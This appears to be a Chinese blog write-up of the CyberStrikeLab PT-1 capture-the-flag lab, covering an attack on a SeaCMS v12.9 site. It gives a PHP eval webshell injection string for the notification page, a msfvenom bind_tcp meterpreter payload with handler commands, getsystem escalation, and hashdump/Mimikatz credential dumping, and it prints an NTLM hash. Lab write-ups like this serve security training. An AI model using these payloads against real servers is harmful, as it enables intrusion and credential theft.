CyberStrikeLab PT-1
考点:seacms rce ,msfvemon 木马,getsystem 权限提升,hashdump/load kiwi+creds_all
# seacms
首先得知是 seacms,但不知道什么版本
# seacms 版本
访问 /data/admin/ver.txt 目录,得到 seacms 版本 v12.9
直接网上搜索版本历史漏洞
参考:https://blog.csdn.net/holyxp/article/details/140734295
直接尝试找后台路径
/cslab/
接着猜出账号密码 cslab:cslab
# seacms rce
在会员消息通知界面可以插入木马命令执行
参考上面博客,在第一行插入一下语句,点击保存即可
1";@eval($_POST[cmd]);;//
系统为 windows
# 蚁剑
注意蚁剑木马连接路径为
http://10.0.0.68/data/admin/notify.php
别用以下路径连接,连不上,但是可以命令执行
http://10.0.0.68/cslab/admin_notify.php
# flag01
flag01 在 C 盘根目录下
# msf 正向连接
之所以要正向连接,本人是 windows 系统,要用虚拟机,如果是 mac 就不用正向连接了
先用命令生成一个正向连接木马
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe
用蚁剑上传到目标,运行
再开启正向连接
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.0.68
set lport 4444
run
# 提权
直接用 getsystem 提权
getsystem
# flag02
直接 hashdump,得到 ntlm cad8ef0c410c9709cea512052756ce5a
或者用 load kiwi 命令载入 Mimikatz
最后用 creds_all 获取全部信息
注意 flag 格式哦!
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 月光倾泻与山海,你跌进我的梦里!